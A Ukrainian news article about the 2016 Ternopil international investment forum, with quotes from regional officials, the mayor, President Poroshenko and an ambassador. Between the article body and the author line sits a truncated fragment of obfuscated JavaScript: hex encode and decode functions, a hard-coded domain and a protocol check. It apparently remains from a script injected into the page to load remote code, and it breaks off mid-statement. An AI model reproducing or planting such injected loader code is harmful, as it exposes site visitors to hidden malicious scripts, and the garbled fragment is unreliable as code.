Ви знаходитесь: Головна / Новини / В Тернополі стартував Міжнародний інвестиційний форум «Тернопільщина INVEST-2016»

В Тернополі стартував Міжнародний інвестиційний форум «Тернопільщина INVEST-2016»

В Тернополі стартував Міжнародний інвестиційний форум «Тернопільщина INVEST-2016». Упродовж двох днів делегації з України та зарубіжжя матимуть змогу оцінити потенціал нашого краю та визначити привабливі для інвестування сфери.

Більше чотирьохсот учасників, з них близько двадцяти іноземних делегацій із різних країн світу, а також керівництво держави та представники українського бізнесу взяли участь у Міжнародному інвестиційному форумі. Головна мета, якого донести інвесторам, що Тернопільщина – надійний партнер та відкрита до співробітництва.

СТЕПАН БАРНА, голова Тернопільської ОДА

«Буде презентуватися більше 30 інвестиційних проектів зі всіх районів Тернопільської області і міста Тернополя. Хочу відзначити, що ми сьогодні виставили, як пропозицію, понад 50 земельних ділянок потенційним інвесторам щодо передачі просто безкоштовно за умови створення умов створення бізнесу і створення робочих місць в Тернопільській області. Вірю в те, що подібні кроки дадуть можливість відкрити і інтелектуальний, і економічний потенціал нашої Тернопільської області».

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Тернопіль є в трійці міст, які найкомфортніші для проживання. Тернопіль серед лідерів за оцінкою у сфері послуг та обслуговування обласних центрів України. Всі ці зміни можна окреслити одним словом – довіра. Саме на довірі до органів місцевого самоврядування і влади, загалом, ґрунтується успішна стратегія залучення інвестицій. Сьогодні в Тернополі працює 78 підприємств з іноземними інвестиціями, які надійшли з 28 країн світу. До таких основних країн-інвесторів, яких сума інвестицій припадає майже 90%, належить Естонія, Польща, Бельгія, Кіпр і Німеччина».

«Тернопільщину INVEST-2016» не оминув увагою Президент України, він у своєму відеозверненні привітав усіх гостей форуму та побажав конструктивної роботи.

ПЕТРО ПОРОШЕНКО, Президент України

«До вашого форуму прикута надзвичайна увага. Понад 400 учасників підтвердили свою зацікавленість Тернопільським краєм, який сьогодні гостинно відкривається перед нами, демонструючи увесь інвестиційний потенціал. Впевнений, що результатом проведення заходу стане залучення іноземних інвестицій, відкриття підприємств і створення нових робочих місць, а отже економічний розвиток Тернопільщини та всієї України».

Представники місцевої влади говорять, що готові максимально сприяти інвесторам, аби вони себе вільно почували на Тернопільщині. Натомість, учасники форуму відзначають найпривабливіші сфери інвестицій нашого краю, зокрема це аграрний сектор та енергозбереження.

МИРОСЛАВ ГОЧАК, президент Світового конгресу українських молодіжних організацій

«Різним інвестиційним фондам є дуже цікаві галузі енергетики, сільського господарства, зрозуміло, що і всі інші, але ці дуже їх зараз багато цікавлять і, звичайно, треба ще багато попрацювати над розвитком інфраструктури в Україні».

АЛІШЕР АБДУАЛІЄВ, Надзвичайний і Повноважний Посол Республіки Узбекистан в Україні

«Мы сегодня специально для этого мероприятия разработали каталог «Узбекистан-Украина. Перспективы взаимодействия», в том числе, там указана и Тернопольщина, где мы предлагаем сотрудничество и направления сотрудничества. Мы рассматриваем Украину уже в качестве площадки для создания предприятий для дальнейшего экспорта нашей продукции».

Вже в Збаражі, в другій половині дня учасники форуму дискутували про перспективи туризму, економічно спроможні громади, партнерство бізнесу та влади. Головне, на думку народного депутата з Тернопільщини, те, що українська економіка перейшла «дно» і зараз знову має тенденції до позитивного руху.

РОМАН ЗАСТАВНИЙ, народний депутат України

«Всі очікували, що приїдуть топ-менеджери величезних компаній, але насправді так не відбувається ніколи. Так зване йде «прощупування» можливостей регіону, потенціалу регіону, сприйняття в регіоні інвесторів. Нижчого рівня менеджери, дуже багато чиновників приїхало, представники різного роду міжнародних інституцій, міжнародних організацій, які найважливіше, що вони будуть культивувати думку і будуть складати думку на міжнародному рівні про ситуацію, яка склалася і в Україні, і в першу чергу в Тернопільській області, що дуже важливо».

Форум лише розпочався і ефект від його проведення, можна буде оцінити пізніше. Однак, основу для подальшої співпраці заклали у перший же день. Голова облдержадміністрації підписав угоду про міжрегіональне співробітництво із Черкаською областю, а також з Тауразьким повітом Литовської Республіки.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top